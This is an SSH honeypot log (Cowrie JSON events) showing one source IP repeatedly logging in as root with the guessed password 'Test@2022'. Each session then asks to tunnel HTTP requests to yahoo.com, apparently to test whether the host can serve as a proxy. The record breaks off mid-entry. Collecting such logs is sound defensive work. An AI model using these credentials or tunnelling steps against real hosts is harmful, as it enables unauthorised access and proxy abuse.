{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.072565Z","src_ip":"213.209.150.239","session":"b023eb96200b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47917,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cd5d708e33b","protocol":"ssh","message":"New connection: 213.209.150.239:47917 (1.2.3.4:22) [session: 0cd5d708e33b]","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.128390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.129139Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.185708Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.468913Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":8188,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8188","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.526530Z","session":"0cd5d708e33b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.583201Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7242,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7242","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.739258Z","session":"0cd5d708e33b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.795995Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.853482Z","src_ip":"213.209.150.239","session":"0cd5d708e33b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":47991,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc9be9787956","protocol":"ssh","message":"New connection: 213.209.150.239:47991 (1.2.3.4:22) [session: dc9be9787956]","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.908985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.918803Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:31.965657Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.247785Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":21835,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21835","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.305234Z","session":"dc9be9787956"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.361902Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":1878,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:1878","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.515011Z","session":"dc9be9787956"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.571466Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.629103Z","src_ip":"213.209.150.239","session":"dc9be9787956"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48067,"dst_ip":"1.2.3.4","dst_port":22,"session":"a17aa5d971c7","protocol":"ssh","message":"New connection: 213.209.150.239:48067 (1.2.3.4:22) [session: a17aa5d971c7]","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.675555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.676364Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.723635Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:32.958502Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11036,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11036","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.006515Z","session":"a17aa5d971c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.053761Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17978,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17978","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.189620Z","session":"a17aa5d971c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.236952Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.284994Z","src_ip":"213.209.150.239","session":"a17aa5d971c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48116,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce41e74fdfc4","protocol":"ssh","message":"New connection: 213.209.150.239:48116 (1.2.3.4:22) [session: ce41e74fdfc4]","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.340463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.341215Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.397892Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.680019Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11556,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11556","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.738278Z","session":"ce41e74fdfc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.795041Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10616,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10616","sensor":"my-vps","timestamp":"2025-08-26T01:07:33.950912Z","session":"ce41e74fdfc4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.007430Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.065051Z","src_ip":"213.209.150.239","session":"ce41e74fdfc4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48279,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb86988503da","protocol":"ssh","message":"New connection: 213.209.150.239:48279 (1.2.3.4:22) [session: fb86988503da]","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.111378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.112482Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.159689Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.395136Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":20492,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20492","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.443471Z","session":"fb86988503da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.490843Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27687,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27687","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.625494Z","session":"fb86988503da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.672610Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.720497Z","src_ip":"213.209.150.239","session":"fb86988503da"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":48339,"dst_ip":"1.2.3.4","dst_port":22,"session":"3162a14acb86","protocol":"ssh","message":"New connection: 213.209.150.239:48339 (1.2.3.4:22) [session: 3162a14acb86]","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.775979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:34.777222Z","src_ip":"213.209.150.239","session":"3162a14acb86"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2